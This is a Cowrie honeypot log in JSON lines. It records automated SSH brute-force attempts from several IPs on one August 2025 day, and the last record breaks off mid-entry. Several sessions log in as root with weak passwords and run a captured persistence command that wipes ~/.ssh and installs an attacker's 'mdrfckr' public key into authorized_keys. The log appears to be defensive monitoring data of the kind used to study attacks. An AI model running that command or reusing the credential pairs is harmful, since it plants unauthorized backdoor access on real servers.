{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:33:35.709684Z","src_ip":"36.89.28.139","session":"17cf67f619de"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:33:35.917559Z","src_ip":"36.89.28.139","session":"17cf67f619de"}
{"eventid":"cowrie.login.success","username":"root","password":"hosting","message":"login attempt [root/hosting] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:33:37.415163Z","src_ip":"36.89.28.139","session":"17cf67f619de"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:33:37.918974Z","src_ip":"36.89.28.139","session":"17cf67f619de"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:33:37.919675Z","src_ip":"36.89.28.139","session":"17cf67f619de"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:33:37.921172Z","src_ip":"36.89.28.139","session":"17cf67f619de"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:33:38.599067Z","src_ip":"36.89.28.139","session":"17cf67f619de"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:33:39.091135Z","src_ip":"36.89.28.139","session":"17cf67f619de"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:33:39.091877Z","src_ip":"36.89.28.139","session":"17cf67f619de"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:33:39.302189Z","src_ip":"36.89.28.139","session":"17cf67f619de"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:33:39.303228Z","src_ip":"36.89.28.139","session":"17cf67f619de"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":41144,"dst_ip":"1.2.3.4","dst_port":22,"session":"7373d5f2f84d","protocol":"ssh","message":"New connection: 36.89.28.139:41144 (1.2.3.4:22) [session: 7373d5f2f84d]","sensor":"my-vps","timestamp":"2025-08-26T00:33:39.456307Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:33:39.457281Z","src_ip":"36.89.28.139","session":"7373d5f2f84d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:33:40.196211Z","src_ip":"36.89.28.139","session":"7373d5f2f84d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:33:41.426599Z","src_ip":"36.89.28.139","session":"7373d5f2f84d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:33:42.507938Z","src_ip":"212.227.125.160","session":"99e50763ee61"}
{"eventid":"cowrie.session.closed","duration":180.40554785728455,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:33:42.513134Z","src_ip":"212.227.125.160","session":"99e50763ee61"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:33:42.603705Z","src_ip":"36.89.28.139","session":"7373d5f2f84d"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":41148,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7a85701f6cc","protocol":"ssh","message":"New connection: 36.89.28.139:41148 (1.2.3.4:22) [session: c7a85701f6cc]","sensor":"my-vps","timestamp":"2025-08-26T00:33:42.790818Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:33:42.791593Z","src_ip":"36.89.28.139","session":"c7a85701f6cc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:33:42.978651Z","src_ip":"36.89.28.139","session":"c7a85701f6cc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:33:43.766042Z","src_ip":"36.89.28.139","session":"c7a85701f6cc"}
{"eventid":"cowrie.session.closed","duration":12.793306112289429,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:33:43.778761Z","src_ip":"212.227.125.160","session":"d157830a48f9"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:33:43.954084Z","src_ip":"36.89.28.139","session":"c7a85701f6cc"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:33:43.971964Z","src_ip":"36.89.28.139","session":"17cf67f619de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42211,"dst_ip":"1.2.3.4","dst_port":23,"session":"a75ad35fa6f6","protocol":"telnet","message":"New connection: 212.227.125.160:42211 (1.2.3.4:23) [session: a75ad35fa6f6]","sensor":"my-vps","timestamp":"2025-08-26T00:33:44.055278Z"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":44860,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6e4b3b1db77","protocol":"ssh","message":"New connection: 45.159.112.103:44860 (1.2.3.4:22) [session: b6e4b3b1db77]","sensor":"my-vps","timestamp":"2025-08-26T00:33:47.161587Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:33:47.162305Z","src_ip":"45.159.112.103","session":"b6e4b3b1db77"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:33:47.273084Z","src_ip":"45.159.112.103","session":"b6e4b3b1db77"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"iloveyou","message":"login attempt [ubuntu/iloveyou] failed","sensor":"my-vps","timestamp":"2025-08-26T00:33:47.757736Z","src_ip":"45.159.112.103","session":"b6e4b3b1db77"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:33:48.870917Z","src_ip":"45.159.112.103","session":"b6e4b3b1db77"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":43640,"dst_ip":"1.2.3.4","dst_port":22,"session":"f825482d29d1","protocol":"ssh","message":"New connection: 24.108.102.132:43640 (1.2.3.4:22) [session: f825482d29d1]","sensor":"my-vps","timestamp":"2025-08-26T00:33:55.808085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:33:55.813279Z","src_ip":"24.108.102.132","session":"f825482d29d1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:33:55.981159Z","src_ip":"24.108.102.132","session":"f825482d29d1"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssvv0rd","message":"login attempt [root/P@ssvv0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:33:56.647072Z","src_ip":"24.108.102.132","session":"f825482d29d1"}
{"eventid":"cowrie.session.closed","duration":12.775165319442749,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:33:56.830327Z","src_ip":"212.227.125.160","session":"a75ad35fa6f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42536,"dst_ip":"1.2.3.4","dst_port":23,"session":"6b470babfbd0","protocol":"telnet","message":"New connection: 212.227.125.160:42536 (1.2.3.4:23) [session: 6b470babfbd0]","sensor":"my-vps","timestamp":"2025-08-26T00:33:56.981320Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:33:57.003579Z","src_ip":"24.108.102.132","session":"f825482d29d1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:33:57.004261Z","src_ip":"24.108.102.132","session":"f825482d29d1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:33:57.005213Z","src_ip":"24.108.102.132","session":"f825482d29d1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:33:57.172570Z","src_ip":"24.108.102.132","session":"f825482d29d1"}
{"eventid":"cowrie.session.closed","duration":46.1689510345459,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:33:57.236317Z","src_ip":"212.227.125.160","session":"cc3e5a0e75be"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:33:57.617825Z","src_ip":"24.108.102.132","session":"f825482d29d1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:33:57.618631Z","src_ip":"24.108.102.132","session":"f825482d29d1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:33:57.782426Z","src_ip":"24.108.102.132","session":"f825482d29d1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:33:57.783478Z","src_ip":"24.108.102.132","session":"f825482d29d1"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":43656,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8e650d5a147","protocol":"ssh","message":"New connection: 24.108.102.132:43656 (1.2.3.4:22) [session: b8e650d5a147]","sensor":"my-vps","timestamp":"2025-08-26T00:33:57.938998Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:33:57.944432Z","src_ip":"24.108.102.132","session":"b8e650d5a147"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:33:58.106877Z","src_ip":"24.108.102.132","session":"b8e650d5a147"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:33:58.761695Z","src_ip":"24.108.102.132","session":"b8e650d5a147"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:33:59.925810Z","src_ip":"24.108.102.132","session":"b8e650d5a147"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":43672,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b7b0d974bc4","protocol":"ssh","message":"New connection: 24.108.102.132:43672 (1.2.3.4:22) [session: 9b7b0d974bc4]","sensor":"my-vps","timestamp":"2025-08-26T00:34:00.082422Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:34:00.087743Z","src_ip":"24.108.102.132","session":"9b7b0d974bc4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS